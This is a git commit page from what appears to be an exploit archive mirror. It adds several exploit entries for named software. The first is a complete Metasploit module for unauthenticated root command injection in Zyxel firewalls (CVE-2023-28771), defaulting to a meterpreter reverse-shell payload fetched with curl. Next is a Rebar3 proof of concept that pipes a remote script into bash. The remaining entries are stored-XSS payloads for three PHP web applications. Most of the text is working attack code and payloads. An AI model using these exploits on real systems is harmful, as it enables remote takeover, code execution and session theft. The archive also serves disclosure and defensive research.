Merge remote-tracking branch 'upstream/main'

CERTCC · Jun 17, 2024 · 75f04cc · 75f04cc
2 parents 81a82c4 + 1064b5c
commit 75f04cc
Show file tree

Hide file tree

Showing 12 changed files with 847 additions and 0 deletions.
diff --git a/exploits/hardware/remote/52049.rb b/exploits/hardware/remote/52049.rb
@@ -0,0 +1,152 @@
+# Exploit Title: Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution
+# Date: 2023-03-31
+# Exploit Author: sf
+# Vendor Homepage: https://www.zyxel.com/
+# Software Link: https://www.zyxel.com/
+# Version: ATP (Firmware version 4.60 to 5.35 inclusive), USG FLEX (Firmware version 4.60 to 5.35 inclusive),
+#          VPN (Firmware version 4.60 to 5.35 inclusive), and ZyWALL/USG (Firmware version 4.60 to 4.73 inclusive)
+# Tested on: Linux
+# CVE : CVE-2023-28771
+
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::Udp
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Zyxel IKE Packet Decoder Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits a remote unauthenticated command injection vulnerability in the Internet Key Exchange
+          (IKE) packet decoder over UDP port 500 on the WAN interface of several Zyxel devices. The affected devices are
+          as follows: ATP (Firmware version 4.60 to 5.35 inclusive), USG FLEX (Firmware version 4.60 to 5.35 inclusive),
+          VPN (Firmware version 4.60 to 5.35 inclusive), and ZyWALL/USG (Firmware version 4.60 to 4.73 inclusive). The
+          affected devices are vulnerable in a default configuration and command execution is with root privileges.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sf', # MSF Exploit & Rapid7 Analysis
+        ],
+        'References' => [
+          ['CVE', '2023-28771'],
+          ['URL', 'https://attackerkb.com/topics/N3i8dxpFKS/cve-2023-28771/rapid7-analysis'],
+          ['URL', 'https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-remote-command-injection-vulnerability-of-firewalls']
+        ],
+        'DisclosureDate' => '2023-03-31',
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => true, # Code execution as 'root'
+        'DefaultOptions' => {
+          # We default to a meterpreter payload delivered via a fetch HTTP adapter.
+          # Another good payload choice is cmd/unix/reverse_bash.
+          'PAYLOAD' => 'cmd/linux/http/mips64/meterpreter_reverse_tcp',
+          'FETCH_WRITABLE_DIR' => '/tmp',
+          'FETCH_COMMAND' => 'CURL'
+        },
+        'Targets' => [ [ 'Default', {} ] ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          # The process /sbin/sshipsecpm may crash after we terminate a session, but it will restart.
+          'Stability' => [CRASH_SERVICE_RESTARTS],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(500)
+      ]
+    )
+  end
+
+
+  def check
+    connect_udp
+
+    # Check for the Internet Key Exchange (IKE) service by sending an IKEv1 header with no payload. We can
+    # expect to receive an IKE reply containing a Notification payload with a PAYLOAD-MALFORMED message.
+
+    # In a default configuration, there appears no known method to identify the platform vendor or version
+    # number, so we cannot identify a CheckCode other than CheckCode::Detected or CheckCode::Unknown.
+    # If a VPN is configured on the target device, we may receive a Vendor ID corresponding to Zyxel, but we
+    # still would not be able to identify the version number of the target service.
+
+    ikev2_header = Rex::Text.rand_text_alpha_upper(8) # Initiator SPI
+    ikev2_header << [0, 0, 0, 0, 0, 0, 0, 0].pack('C*') # Responder SPI
+    ikev2_header << [0].pack('C') # Next Payload: None - 0
+    ikev2_header << [16].pack('C') # Version: 1.0 - 16 (0x10)
+    ikev2_header << [2].pack('C') # Exchange Type: Identity Protection - 2
+    ikev2_header << [0].pack('C') # Flags: None - 0
+    ikev2_header << [0].pack('N') # ID: 0
+    ikev2_header << [ikev2_header.length + 4].pack('N') # Length
+
+    udp_sock.put(ikev2_header)
+
+    ikev2_reply = udp_sock.get(udp_sock.def_read_timeout)
+
+    disconnect_udp
+
+    if !ikev2_reply.empty? && (ikev2_reply.length >= 40) &&
+       # Ensure the response 'Initiator SPI' field is the same as the original one sent.
+       (ikev2_reply[0, 8] == ikev2_header[0, 8]) &&
+       # Ensure the 'Next Payload' field is Notification (11)
+       (ikev2_reply[16, 1].unpack('C').first == 11 &&
+         # Ensure the 'Exchange Type' field is Informational (5)
+         (ikev2_reply[18, 1].unpack('C').first == 5)) &&
+       # Ensure the 'Notify Message Type' field is PAYLOAD-MALFORMED (16)
+       (ikev2_reply[38, 2].unpack('n').first == 16)
+      return CheckCode::Detected('IKE detected but device vendor and service version are unknown.')
+    end
+
+    CheckCode::Unknown
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+  end
+
+  def execute_command(cmd)
+    connect_udp
+
+    cmd_injection = "\";bash -c \"#{cmd}\";echo -n \""
+
+    # This value is decoded by the packet decoder using a DES-CBC algorithm. The decoded value is written to the
+    # log file. As such the decoded value must not have any null terminator values as these will break our command
+    # payload. Therefore we use the below known good value that will decode to a suitable string, allowing the cmd
+    # injection payload to work as expected.
+    haxb48 = 'HAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXB'
+
+    ikev2_payload = [0].pack('C') # Next Payload: None - 0
+    ikev2_payload << [0].pack('C') # Reserved: 0
+    ikev2_payload << [8 + (haxb48.length + cmd_injection.length)].pack('n') # Length: 8 byte header + Notification Data
+    ikev2_payload << [1].pack('C') # Protocol ID: ISAKMP - 1
+    ikev2_payload << [0].pack('C') # SPI Size: None - 0
+    ikev2_payload << [14].pack('n') # Type: NO_PROPOSAL_CHOSEN - 14 (0x0E)
+    ikev2_payload << haxb48 + cmd_injection # Notification Data
+
+    ikev2_header = Rex::Text.rand_text_alpha_upper(8) # Initiator SPI
+    ikev2_header << [0, 0, 0, 0, 0, 0, 0, 0].pack('C*') # Responder SPI
+    ikev2_header << [41].pack('C') # Next Payload: Notify - 41 (0x29)
+    ikev2_header << [32].pack('C') # Version: 2.0 - 32 (0x20)
+    ikev2_header << [34].pack('C') # Exchange Type: IKE_SA_INIT - 34 (0x22)
+    ikev2_header << [8].pack('C') # Flags: Initiator - 8
+    ikev2_header << [0].pack('N') # ID: 0
+    ikev2_header << [ikev2_header.length + 4 + ikev2_payload.length].pack('N') # Length
+
+    packet = ikev2_header << ikev2_payload
+
+    udp_sock.put(packet)
+
+    disconnect_udp
+  end
+
+end
diff --git a/exploits/multiple/webapps/52051.txt b/exploits/multiple/webapps/52051.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Rebar3 3.13.2 Command Injection
+# Date: 2020-06-03
+# Exploit Author: Alexey Pronin
+# Vendor Homepage: https://rebar3.org
+# Software Link: https://github.com/erlang/rebar3
+# Versions affected: 3.0.0-beta.3 - 3.13.2
+# Tested on: Linux
+# CVE: CVE-2020-13802
+
+1. Description:
+----------------------
+
+Rebar3 versions 3.0.0-beta.3 to 3.13.2 are vulnerable to OS command injection via URL parameter of dependency specification.
+
+2. Proof of Concept:
+----------------------
+
+* Add dependency with any of the following specification:
+
+    {
+      'dephelper', ".*", {
+        hg, "https://github.com/vulnbe/poc-rebar3-helper.git?repo=main&threadId=19:[email protected]&ctx=channel|curl\t-fsSL\thttps://gist.githubusercontent.com/vulnbe/6e5ec8fae3bdbee8e5f11f15c1462e48/raw/94616f0ee52935fda458c889d6f686958c79a2c8/poc.sh|bash\t-|git\tclone\thttps://github.com/vulnbe/poc-rebar3-helper.git",
+      "dephelper"}
+    }
+
+    or
+
+    {
+      'poc_rebar3', ".*", {
+        git, "https://github.com/vulnbe/poc-rebar3.git"
+      }
+    }
+
+* Execute command: rebar3 clean
+
+References
+----------------------
+* [Rebar3 vulnerability analysis](https://vuln.be/post/rebar3-command-injection/)
+* [POC](https://github.com/vulnbe/poc-rebar3.git)
+* [Vulnerability remediation PR](https://github.com/erlang/rebar3/pull/2302)
+* [CVE-2020-13802](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13802)
diff --git a/exploits/php/webapps/52042.txt b/exploits/php/webapps/52042.txt
@@ -0,0 +1,74 @@
+# Exploit Title:  Life Insurance Management Stored System- cross-site scripting (XSS)
+# Exploit Author: Aslam Anwar Mahimkar
+# Date: 18-05-2024
+# Category: Web application
+# Vendor Homepage: https://projectworlds.in/
+# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/
+# Version: AEGON LIFE v1.0
+# Tested on: Linux
+# CVE: CVE-2024-36599
+
+# Description:
+----------------
+
+A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter at insertClient.php.
+
+
+# Payload:
+----------------
+
+<script>alert(document.domain)</script>
+
+
+# Attack Vectors:
+-------------------------
+
+To exploit this vulnerability use <script>alert(document.domain)</script> when user visit Client.php we can see the XSS.
+
+# Burp Suite Request:
+----------------------------
+
+POST /lims/insertClient.php HTTP/1.1
+Host: localhost
+Content-Length: 30423
+Cache-Control: max-age=0
+sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymKfAe0x95923LzQH
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/lims/addClient.php
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n
+Connection: close
+
+------WebKitFormBoundarymKfAe0x95923LzQH
+Content-Disposition: form-data; name="client_id"
+
+1716051159
+
+------WebKitFormBoundarymKfAe0x95923LzQH
+Content-Disposition: form-data; name="client_password"
+
+password
+
+------WebKitFormBoundarymKfAe0x95923LzQH
+Content-Disposition: form-data; name="name"
+
+<script>alert(document.domain)</script>
+
+------WebKitFormBoundarymKfAe0x95923LzQH
+Content-Disposition: form-data; name="fileToUpload"; filename="runme.jpg_original"
+
+Content-Type: application/octet-stream
+
+
+ÿØÿà
diff --git a/exploits/php/webapps/52043.txt b/exploits/php/webapps/52043.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Persistent XSS in Carbon Forum 5.9.0 (Stored)
+# Date: 06/12/2024
+# Exploit Author: Chokri Hammedi
+# Vendor Homepage: https://www.94cb.com/
+# Software Link: https://github.com/lincanbin/Carbon-Forum
+# Version: 5.9.0
+# Tested on: Windows XP
+# CVE: N/A
+
+## Vulnerability Details
+
+A persistent (stored) XSS vulnerability was discovered in Carbon Forum
+version 5.9.0. The vulnerability allows an attacker to inject malicious
+JavaScript code into the Forum Name field under the admin settings. This
+payload is stored on the server and executed in the browser of any user who
+visits the forum, leading to potential session hijacking, data theft, and
+other malicious activities.
+
+## Steps to Reproduce
+
+1. Login as Admin: Access the Carbon Forum with admin privileges.
+2. Navigate to Settings: Go to the '/dashboard' and select the Basic
+section.
+3. Enter Payload : Input the following payload in the Forum Name field:
+
+    <script>alert('XSS');</script>
+
+4. Save Settings: Save the changes.
+5. The xss payload will triggers
diff --git a/exploits/php/webapps/52044.txt b/exploits/php/webapps/52044.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Persistent XSS in XMB 1.9.12.06
+# Date: 06/12/2024
+# Exploit Author: Chokri Hammedi
+# Vendor Homepage: https://www.xmbforum2.com/
+# Software Link: https://www.xmbforum2.com/download/XMB-1.9.12.06.zip
+# Version: 1.9.12.06
+# Tested on: Windows XP
+# CVE: N/A
+
+## Vulnerability Details
+
+A persistent (stored) XSS vulnerability was discovered in XMB 1.9.12.06.
+The vulnerability allows an attacker to inject malicious JavaScript code
+into a template or specific fields. This payload is stored on the server
+and executed in the browser of any user who visits the forum, leading to
+potential session hijacking, data theft, and other malicious activities.
+
+### XSS in Template
+
+An attacker can inject malicious JavaScript code into a template:
+
+1. Login as Admin: Access the XMB Forum with admin privileges.
+2. Navigate to the Administration Panel: Go to `/cp.php`, then in "Look &
+Feel" select "Templates". This will go to `/cp2.php?action=templates`.
+Select the "footer" template and click edit.
+3. Enter Payload: Add the XSS payload in the footer template:
+
+
+    <script>alert('XSS');</script>
+
+
+4. Save the Change: Click "Submit Changes".
+5. Trigger the Payload: The XSS payload will trigger anywhere the footer
+template is rendered.
+
+### XSS in News Ticker
+
+An attacker can inject malicious JavaScript code into the News Ticker field
+of the Front Page Options:
+
+1. Login as Admin: Access the XMB Forum with admin privileges.
+2. Navigate to the Administration Panel: Go to `/cp.php`, then in
+"Settings" go to "Front Page Options".
+3. Enter Payload: Add the XSS payload in the "News in Newsticker" field:
+
+   <img src=x onerror=alert(1)>
+
+
+4. Save the Change: Click "Submit Changes".
+5. Trigger the Payload: The XSS payload will trigger anywhere the News
+Ticker is displayed eg, home page